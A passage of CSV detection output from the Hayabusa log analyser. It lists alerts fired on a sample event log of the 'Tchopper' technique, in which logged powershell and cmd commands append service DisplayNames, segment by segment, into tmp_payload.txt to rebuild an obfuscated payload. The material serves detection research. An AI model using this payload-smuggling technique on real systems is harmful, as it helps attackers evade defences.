0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:17.100 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:17.116 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:20.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:20.064 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:22.968 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:22.984 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:24.421 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:24.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:25.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:25.884 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:27.322 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:27.338 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:31.756 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:31.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:36.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:36.138 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:40.532 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xadc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:40.547 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:44.878 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:44.893 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:46.331 